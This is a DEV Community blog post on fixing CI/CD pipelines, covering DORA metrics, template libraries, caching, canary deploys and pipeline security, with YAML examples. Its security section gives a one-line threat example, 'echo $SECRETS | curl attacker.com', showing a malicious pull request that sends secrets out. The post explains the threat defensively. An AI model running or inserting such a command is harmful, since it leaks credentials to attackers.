DEV Community

S, Sanjay
Your CI/CD Pipeline is a Dumpster Fire — Here's the Extinguisher 🧯

🎬 Welcome to Pipeline Therapy

Let me describe your CI/CD pipeline. Stop me when I'm wrong:

  1. It takes 42 minutes to build and deploy
  2. Nobody knows exactly what it does (the YAML is 800 lines)
  3. Each team has their own custom pipeline because "our needs are different"
  4. Flaky tests fail 20% of the time, and everyone just re-runs the pipeline
  5. There's a manual approval step where someone clicks "Approve" without looking
  6. Someone set it up 3 years ago and that person doesn't work here anymore

Was I close? 😏

Let's fix all of this.


📊 DORA Metrics: How to Know If You're Actually Good

Before fixing anything, you need to measure where you stand. Google's DORA research (14,000+ teams studied) identified 4 key metrics that predict software delivery performance:

 Metric                 │ Elite        │ "We Need Help"
────────────────────────┼──────────────┼─────────────────
 Deployment Frequency   │ Multiple/day │ Monthly or less
 Lead Time for Changes  │ < 1 hour     │ > 1 month
 Change Failure Rate    │ 0-15%        │ > 45%
 Mean Time to Recovery  │ < 1 hour     │ > 6 months

Here's the Uncomfortable Truth

If your team deploys once a week, your lead time is 3 days, and your change failure rate is 30% — you are statistically average. Not bad, but not good either.

Elite teams deploy hundreds of times per day with less than 15% failure rate. They're not smarter — they have better pipelines, smaller changes, and more automation.

How to Track DORA Now

# GitHub Actions: Track deployment frequency
- name: Record deployment
  run: |
    curl -X POST "${{ secrets.METRICS_ENDPOINT }}" \
      -H "Content-Type: application/json" \
      -d '{
        "event": "deployment",
        "service": "${{ github.repository }}",
        "environment": "production",
        "sha": "${{ github.sha }}",
        "timestamp": "'$(date -u +%Y-%m-%dT%H:%M:%SZ)'"
      }'

Or use tools like Sleuth, LinearB, or GitHub's built-in DORA metrics (available in GitHub Insights for Enterprise).
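Lead time for changes can be captured in the same deploy job, by measuring the gap between the deployed commit and now. A minimal sketch, reusing the hypothetical `METRICS_ENDPOINT` from the deployment snippet (assumes the checkout step fetched the commit being deployed):

```yaml
# GitHub Actions: Track lead time for changes
- name: Record lead time
  run: |
    # Seconds between the deployed commit's author time and now
    COMMIT_TS=$(git show -s --format=%ct ${{ github.sha }})
    NOW=$(date -u +%s)
    curl -X POST "${{ secrets.METRICS_ENDPOINT }}" \
      -H "Content-Type: application/json" \
      -d "{\"event\": \"lead_time\", \"service\": \"${{ github.repository }}\", \"seconds\": $((NOW - COMMIT_TS))}"
```

With deployment events and lead-time events flowing to one endpoint, deployment frequency and lead time fall out of a simple aggregation query.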


πŸ—οΈ Pipeline Architecture: The Template Library Pattern

The Anti-Pattern: Every Team Reinvents the Wheel

Team Alpha:   800-line custom YAML → Azure DevOps
Team Bravo:   600-line custom YAML → Azure DevOps (different structure)
Team Charlie: "We just deploy from our laptops" → 😱

Result:
  • 3 different security scanning approaches
  • 2 teams forgot to add container image scanning
  • 1 team has no tests in their pipeline
  • Nobody can help debug another team's pipeline

The Solution: Shared Template Library

┌──────────────────────────────────────────────────┐
│         Shared Template Library (v2.5.0)         │
│                                                  │
│  ┌───────────┐ ┌───────────┐ ┌───────────────┐   │
│  │  Build    │ │  Test     │ │  Security     │   │
│  │  Template │ │  Template │ │  Scan         │   │
│  │  (.NET,   │ │  (unit,   │ │  Template     │   │
│  │   Node,   │ │  integ,   │ │  (Trivy,      │   │
│  │   Python) │ │  e2e)     │ │   Checkov)    │   │
│  └───────────┘ └───────────┘ └───────────────┘   │
│  ┌───────────┐ ┌───────────┐ ┌───────────────┐   │
│  │  Deploy   │ │  Notify   │ │  Rollback     │   │
│  │  Template │ │  Template │ │  Template     │   │
│  │  (K8s,    │ │  (Slack,  │ │  (auto/       │   │
│  │   AppSvc) │ │   Teams)  │ │   manual)     │   │
│  └───────────┘ └───────────┘ └───────────────┘   │
└──────────────────────────────────────────────────┘
         │ consumed by
         ▼
┌──────────────────────────────────────────────────┐
│  Team pipelines (10-20 lines each!)              │
│  "Use build template, test template, deploy      │
│   template — just tell it your service name"     │
└──────────────────────────────────────────────────┘

Azure DevOps: Template Library in Action

# Team's pipeline: SHORT and STANDARD
trigger:
  branches:
    include: [main]

resources:
  repositories:
    - repository: templates
      type: git
      name: platform/pipeline-templates
      ref: refs/tags/v2.5.0    # 🔑 Always pin the version!

stages:
  - template: stages/ci.yml@templates
    parameters:
      language: dotnet
      dotnetVersion: '8.0'
      testProjects: '**/*Tests.csproj'

  - template: stages/security-scan.yml@templates
    parameters:
      trivySeverity: 'CRITICAL,HIGH'

  - template: stages/deploy-k8s.yml@templates
    parameters:
      environment: staging
      aksCluster: aks-staging-eastus
      namespace: payments

  - template: stages/deploy-k8s.yml@templates
    parameters:
      environment: production
      aksCluster: aks-prod-eastus
      namespace: payments
      requireApproval: true
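On the platform side, the consumed template is just a parameterized stage. A sketch of what `stages/ci.yml` might look like — the parameter names match the caller above, but the job internals are illustrative, not a definitive implementation:

```yaml
# stages/ci.yml in platform/pipeline-templates (illustrative sketch)
parameters:
  - name: language
    type: string
  - name: dotnetVersion
    type: string
    default: '8.0'
  - name: testProjects
    type: string
    default: '**/*Tests.csproj'

stages:
  - stage: CI
    jobs:
      - job: BuildAndTest
        steps:
          - task: UseDotNet@2
            inputs:
              packageType: sdk
              version: '${{ parameters.dotnetVersion }}.x'
          - script: dotnet build --configuration Release
            displayName: Build
          - script: dotnet test ${{ parameters.testProjects }} --configuration Release
            displayName: Test
```

Because `${{ parameters.x }}` is resolved at template expansion time, every team gets the same build/test shape while still controlling the inputs.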

GitHub Actions: Reusable Workflows

# .github/workflows/deploy.yml — Team's workflow
name: Deploy
on:
  push:
    branches: [main]

jobs:
  build-and-test:
    uses: myorg/shared-workflows/.github/workflows/build-dotnet.yml@v2.5.0
    with:
      dotnet-version: '8.0'
      project-path: 'src/PaymentService'

  security-scan:
    needs: build-and-test
    uses: myorg/shared-workflows/.github/workflows/security-scan.yml@v2.5.0
    with:
      image: ${{ needs.build-and-test.outputs.image }}

  deploy:
    needs: [build-and-test, security-scan]
    uses: myorg/shared-workflows/.github/workflows/deploy-k8s.yml@v2.5.0
    with:
      environment: production
      image: ${{ needs.build-and-test.outputs.image }}
    secrets: inherit
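The callee side declares `workflow_call` with typed inputs and outputs. A sketch of what `build-dotnet.yml` might contain — repo names, the publish command, and the image tag scheme are assumptions:

```yaml
# build-dotnet.yml in myorg/shared-workflows (illustrative sketch)
name: Build .NET
on:
  workflow_call:
    inputs:
      dotnet-version:
        type: string
        required: true
      project-path:
        type: string
        required: true
    outputs:
      image:
        description: Image tag produced by the build
        value: ${{ jobs.build.outputs.image }}

jobs:
  build:
    runs-on: ubuntu-latest
    outputs:
      image: ${{ steps.meta.outputs.image }}
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-dotnet@v4
        with:
          dotnet-version: ${{ inputs.dotnet-version }}
      - run: dotnet publish ${{ inputs.project-path }} -c Release
      - id: meta
        run: echo "image=ghcr.io/${{ github.repository }}:${{ github.sha }}" >> "$GITHUB_OUTPUT"
```

The `outputs.image` mapping is what lets the caller's `needs.build-and-test.outputs.image` work across the workflow boundary.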

⚡ Pipeline Performance: From 45 Minutes to 5

Where's the Time Going?

In my experience auditing pipelines, here's where time hides:

Typical 45-minute pipeline breakdown:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  7 min  │██████│        Agent startup + checkout
 12 min  │████████████│  Dependency install (npm/nuget)
  5 min  │█████│         Build
  8 min  │████████│      Tests (running ALL tests sequentially)
  3 min  │███│           Docker build (no layer caching)
  5 min  │█████│         Security scanning
  5 min  │█████│         Deploy + smoke tests
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 45 min total  💀

Optimized 5-minute pipeline:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  0.5 min │█│            Cached checkout
  0.5 min │█│            Cached dependencies
  1 min   │██│           Incremental build
  1 min   │██│           Parallel tests (affected only)
  0.5 min │█│            Docker build (cached layers)
  1 min   │██│           Parallel: scan + deploy
  0.5 min │█│            Smoke test
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  5 min total  🚀

The Optimization Playbook

1. Cache Everything

# GitHub Actions: Cache node_modules
- uses: actions/cache@v4
  with:
    path: ~/.npm
    key: npm-${{ hashFiles('**/package-lock.json') }}
    restore-keys: npm-

# Azure DevOps: Cache NuGet packages
- task: Cache@2
  inputs:
    key: 'nuget | "$(Agent.OS)" | **/packages.lock.json'
    restoreKeys: 'nuget | "$(Agent.OS)"'
    path: $(NUGET_PACKAGES)

2. Docker Layer Caching

# BAD: Copying everything first breaks the cache
COPY . .
RUN npm install

# GOOD: Copy package files first, install, THEN copy code
COPY package.json package-lock.json ./
RUN npm ci --production
COPY . .
# Now code changes don't re-trigger npm install
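An ordered Dockerfile only helps if the layer cache survives between CI runs, which it doesn't on ephemeral runners. One way to persist it is the GitHub Actions cache backend of buildx — a sketch, with a placeholder image name:

```yaml
# GitHub Actions: persist Docker layer cache across ephemeral runners
- uses: docker/setup-buildx-action@v3
- uses: docker/build-push-action@v5
  with:
    context: .
    push: true
    tags: ghcr.io/myorg/payments:${{ github.sha }}   # placeholder image name
    cache-from: type=gha            # pull previous layers from the Actions cache
    cache-to: type=gha,mode=max     # save ALL layers, not just the final image's
```

`mode=max` trades cache storage for hit rate; for multi-stage builds it's usually the difference between a cold and a warm build.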

3. Run Tests in Parallel

# GitHub Actions: Matrix strategy
jobs:
  test:
    strategy:
      matrix:
        shard: [1, 2, 3, 4]
    steps:
      - run: npm test -- --shard=${{ matrix.shard }}/4

4. Only Test What Changed

# For monorepos: detect which service changed
- uses: dorny/paths-filter@v3
  id: changes
  with:
    filters: |
      payments:
        - 'services/payments/**'
      users:
        - 'services/users/**'

- name: Test payments
  if: steps.changes.outputs.payments == 'true'
  run: cd services/payments && npm test

🚨 Real-World Disaster #1: The Self-Hosted Runner That Poisoned Everything

The Error:

ERROR: npm ERR! ENOSPC: no space left on device

What Happened: Self-hosted build agents accumulated Docker images, node_modules caches, and build artifacts over months. Disk filled up. Builds started failing randomly across all teams.

Worse: One build left behind a corrupted node_modules folder. The next build on the same agent used the cached corruption and deployed a broken application.

The Fix:

  • Use ephemeral agents (fresh VM/container per build) β€” Azure DevOps Scale Set agents or GitHub Actions hosted runners
  • If self-hosted, add a cleanup job:
- name: Agent cleanup
  condition: always()
  run: |
    docker system prune -af --volumes
    rm -rf /tmp/build-*

🚒 Deployment Strategies: How to Ship Without Sinking

The Deployment Strategy Menu

Strategy       │ Risk   │ Speed   │ Rollback │ Best For
───────────────┼────────┼─────────┼──────────┼────────────────────────
Rolling Update │ Med    │ Fast    │ Slow     │ Default K8s strategy
Blue-Green     │ Low    │ Fast    │ Instant  │ Stateless services
Canary         │ Low    │ Slow    │ Fast     │ High-risk changes
Feature Flags  │ Lowest │ Instant │ Instant  │ Business logic changes

Canary Deployment: The Smart Way to Ship

Step 1: Deploy new version to 5% of traffic
  ┌─────────────────────────────────┐
  │  95% traffic → v1.0 (3 pods)    │
  │   5% traffic → v2.0 (1 pod)     │   ← Watch error rates, latency
  └─────────────────────────────────┘

Step 2: If metrics look good, increase to 25%
  ┌─────────────────────────────────┐
  │  75% traffic → v1.0 (3 pods)    │
  │  25% traffic → v2.0 (1 pod)     │   ← Still watching...
  └─────────────────────────────────┘

Step 3: If still good, go to 100%
  ┌─────────────────────────────────┐
  │ 100% traffic → v2.0 (3 pods)    │   ← 🎉 Full rollout
  └─────────────────────────────────┘

Step ABORT: If any stage looks bad
  ┌─────────────────────────────────┐
  │ 100% traffic → v1.0 (3 pods)    │   ← 😌 Safely rolled back
  │   0% traffic → v2.0 (removed)   │
  └─────────────────────────────────┘
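On Kubernetes, these staged weights map directly onto a progressive-delivery controller. A sketch using Argo Rollouts (one option among several; Flagger is another) — the pause durations and the analysis template name are assumptions:

```yaml
apiVersion: argoproj.io/v1alpha1
kind: Rollout
metadata:
  name: payments
spec:
  replicas: 3
  strategy:
    canary:
      steps:
        - setWeight: 5            # Step 1: 5% of traffic
        - pause: { duration: 2h } # watch error rates, latency
        - setWeight: 25           # Step 2
        - pause: { duration: 1h }
        - setWeight: 100          # Step 3: full rollout
      analysis:
        templates:
          - templateName: error-rate-check   # hypothetical AnalysisTemplate
```

If the analysis fails at any step, the controller aborts and shifts traffic back to the stable version — the "Step ABORT" path above, with no human in the loop.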

🚨 Real-World Disaster #2: The Friday 5 PM Deployment

What Happened: Team deploys at 5:07 PM on Friday (bad idea, but deadlines). Rolling update replaces all 3 pods. New version has a memory leak that manifests after 4 hours. At 9 PM, pods start OOMKilling. Nobody's monitoring. By Saturday morning, the payment service has been down for 12 hours.

If they had used canary: The 5% canary pod would have shown increasing memory usage within 2 hours. Automated rollback triggers at 7 PM. 95% of users never noticed. Team enjoys their weekend.

The Golden Rules:

  1. Never deploy on Friday (unless you have canary + automated rollback)
  2. Never deploy during peak hours (find your low-traffic window)
  3. Always have automated rollback based on error rates and latency
  4. Small changes, frequent deploys > big changes, occasional deploys
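Golden rule 3 can start as a simple post-deploy gate in the pipeline itself. A sketch (GitHub Actions step; the Prometheus URL, metric names, and 5% threshold are assumptions, not a definitive implementation):

```yaml
- name: Error-rate gate (auto-rollback)
  run: |
    # Query the 5xx ratio over the last 5 minutes from a hypothetical Prometheus
    RATE=$(curl -s "$PROM_URL/api/v1/query" \
      --data-urlencode 'query=sum(rate(http_requests_total{code=~"5.."}[5m])) / sum(rate(http_requests_total[5m]))' \
      | jq -r '.data.result[0].value[1] // "0"')
    if awk "BEGIN {exit !($RATE > 0.05)}"; then
      echo "Error rate $RATE above 5%, rolling back"
      kubectl rollout undo deployment/payments
      exit 1
    fi
```

A real setup would also gate on latency percentiles and run the check repeatedly over a soak window, but even this crude version beats "nobody's monitoring" on a Friday night.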

πŸ” Pipeline Security: Your Pipeline is an Attack Vector

Your CI/CD pipeline has more access than most developers:

  • It can push code to production
  • It has access to secrets and credentials
  • It can modify infrastructure
  • It downloads code from the internet (dependencies)

Things That Should Scare You

Scary Thing #1: Secrets in pipeline logs
  ┌──────────────────────────────────────────────┐
  │ Step: Deploy                                 │
  │ $ echo $DATABASE_CONNECTION_STRING           │
  │ Server=prod.db.windows.net;Password=Pa$$w0rd │  ← 🫠
  └──────────────────────────────────────────────┘

Scary Thing #2: Pull request pipelines run arbitrary code
  ┌──────────────────────────────────────────────┐
  │ External contributor opens PR                │
  │ PR changes build script to:                  │
  │   echo $SECRETS | curl attacker.com          │
  │ Pipeline runs automatically...               │  ← 😱
  └──────────────────────────────────────────────┘

Scary Thing #3: Dependency confusion attacks
  ┌──────────────────────────────────────────────┐
  │ Internal package: @mycompany/utils           │
  │ Attacker publishes: @mycompany/utils on npm  │
  │ Pipeline installs public one first...        │  ← 🦠
  └──────────────────────────────────────────────┘
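Scary Thing #3 is largely neutralized by forcing internal scopes to resolve only from your private registry before any install runs. A sketch as a pipeline step (the registry URL is a placeholder):

```yaml
- name: Pin internal scope to private registry
  run: |
    # Ensure @mycompany packages can only resolve from the internal feed
    npm config set @mycompany:registry "https://pkgs.example.com/npm/"
    npm ci   # lock file + scoped registry = no public lookalike installs
```

Committing the same mapping in a checked-in `.npmrc` works too; the point is that scope resolution must be explicit, never left to the public registry's defaults.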

Pipeline Security Checklist

Authentication:
  ✅ OIDC federation (no long-lived secrets in pipelines)
  ✅ Managed Identity for Azure resources
  ✅ Short-lived tokens (expire in minutes, not months)

Authorization:
  ✅ Pipeline can only deploy to its own service
  ✅ Production deploys require approved PR + passing checks
  ✅ Environment protection rules with required reviewers

Dependencies:
  ✅ Lock files committed (package-lock.json, go.sum)
  ✅ Dependency scanning (Dependabot, Snyk)
  ✅ Private package registry for internal packages

Secrets:
  ✅ Never echo/print secrets in logs
  ✅ Use secret masking in pipeline variables
  ✅ Rotate secrets automatically
  ✅ Audit who accesses what secret
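The authorization items are enforced in GitHub Actions by targeting a protected environment from the job; the required reviewers and wait timers live in the repository's environment settings, not in YAML. A minimal sketch (the URL is a placeholder):

```yaml
jobs:
  deploy:
    runs-on: ubuntu-latest
    environment:
      name: production    # protection rules (required reviewers, wait timer) apply here
      url: https://payments.example.com   # placeholder, shown on the deployment record
    steps:
      - run: echo "This step only runs after the environment's approval gate"
```

Azure DevOps has the equivalent concept in Environments with approvals and checks attached to the deployment stage.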

🚨 Real-World Disaster #3: The Secret That Wasn't Secret

What Happened: A developer added a debug step to a pipeline:

- name: Debug connection
  run: |
    echo "Connecting to: ${{ secrets.DB_CONNECTION_STRING }}"

GitHub/Azure DevOps masks secrets in logs... usually. But this string was partially masked because it contained special characters that broke the masking regex. The full production database password appeared in the build log. The build log was accessible to 200 developers.

The Fix:

  1. Remove all echo/print statements that reference secrets
  2. Use OIDC federation so there are no secrets to leak:
# GitHub Actions: OIDC to Azure (no secrets!)
permissions:
  id-token: write
  contents: read

steps:
  - uses: azure/login@v2
    with:
      client-id: ${{ vars.AZURE_CLIENT_ID }}      # Not a secret!
      tenant-id: ${{ vars.AZURE_TENANT_ID }}
      subscription-id: ${{ vars.AZURE_SUBSCRIPTION_ID }}

πŸ“ Multi-Team Governance: Herding Cats With Guardrails

At the Principal level, you're not just building pipelines — you're building the pipeline platform that 10+ teams use. Here's how to standardize without becoming a bottleneck:

Platform Team Provides:          App Teams Customize:
════════════════════════         ════════════════════
✅ Template library              ✅ Service name & config
✅ Security scanning             ✅ Test commands
✅ Deployment strategies         ✅ Environment-specific vars
✅ Secret management pattern     ✅ Notification channels
✅ DORA metrics collection       ✅ Deployment schedule
✅ Compliance guardrails         ✅ Custom test stages

The Inner Source Model

Template repo: platform/pipeline-templates
├── Maintained by platform team
├── Versioned with semantic versioning (v2.5.0)
├── Teams consume via git tags (immutable reference)
├── Breaking changes = major version bump
├── Teams can contribute improvements via PR
└── Monthly "template office hours" for questions

🎯 Key Takeaways

  1. Measure DORA metrics — you can't improve what you don't measure
  2. Template libraries standardize quality without removing team autonomy
  3. Cache everything to cut build times by 80%+
  4. Canary deployments are the safest way to ship to production
  5. OIDC federation eliminates the #1 pipeline security risk (leaked secrets)
  6. Never deploy on Friday. Just don't. 🙅

🔥 Homework

  1. Time your pipeline end-to-end. Write down the duration of each step. Find the biggest bottleneck.
  2. Check if your pipeline uses long-lived secrets. Replace one with OIDC federation.
  3. Add caching for dependencies if you haven't already — measure the before/after build time.

Next up in the series: **Your App is on Fire and You Don't Even Know: Observability for Humans** — where we decode metrics, logs, traces, and why alert fatigue is slowly killing your team.


💬 What's the longest CI/CD pipeline you've ever suffered through? I once saw a 3-hour Java build. Yes, three hours. Share your pain below. 🍕
